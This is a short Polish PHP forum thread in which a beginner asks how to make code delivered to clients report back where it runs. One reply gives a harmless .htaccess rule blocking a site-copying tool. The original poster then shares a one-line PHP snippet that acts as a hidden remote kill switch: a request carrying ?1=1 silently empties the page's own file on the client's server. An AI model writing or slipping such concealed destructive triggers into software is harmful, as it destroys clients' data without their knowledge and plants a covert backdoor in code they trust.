Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: [php] Przeslanie zmiennej do php na innym serwerze
Forum PHP.pl > Forum > Przedszkole
gomu
Hello,
ma to byc zabezpieczenie mojego kodu przed rozpowszechnianiem, chcialbym zeby string z URLem, przeslany zostal do pliku php na moim serwerze, podczas gdy sam skrypt wysylajacy znajdowal by sie na obcym, blizej nei okreslonym serwie, w ten sposob widzial bym kto i na jakim serwerze korzysta z mojego kodu....
jestem blado zielony w php wiec prosze o pomoc w konstrukcji....
Prym
szczerze mówiąc to takie rozwiązanie jest dość męczące dla klienta. jesli nie posiadasz własnego szybkiego serwera na którym będziesz miał swoje skrypty to przyblokujesz strony swoich klientów - piszę tak bo aktualnie mam własnie taki rodzynek gosc sie zwrocił do mnie o napisanie serwisu bo to czego uzywa poprostu go denerwuje i własnie sie okazało ze jego aktualna strona bazuje na czyms takim jak piszesz. ja osobiscie podchodzę do sprawy kodu w inny sposob - staram sie zabezpieczyć/ac możliwość dostępu do serwera przez programy zasysające serwisy (w pliku .htaccess wpisujesz odpowiednie linijki i takie programy juz nie bedą mogły pobrać twojego skryptu). i ogolnie jesli ktoś będzie chciał "pożyczyć" twoj skrypt to zawsze znajdzie sposób.

ups zapomniałem o przykladowym kodzie w apachu:
taki przyklad dla teleporta
Kod
RewriteCond %{HTTP_USER_AGENT} Teleport [NC,OR]
RewriteRule .* - [F,L]
gomu
wiesz, nie dokladnie o to mi chodzi, chce miec mozliwosc zlokalizowania mojego produktu (strony/kodu) po przekazaniu jej "klientowi"
juz napisalem warunkowa instrukcje, ktora po dodaniu do URLa ?1=1 wyczysci strone, jesli klient nie zmienie chmoda....

Kod
<?$u=$_SERVER['SCRIPT_URI'];$f=basename($u);if($_GET['1']==1){if(is_writeable($f)){if($p=fopen($f,"w+")){if(fwrite($p,"")!==FALSE)echo"OK";fclose($p);};};}?>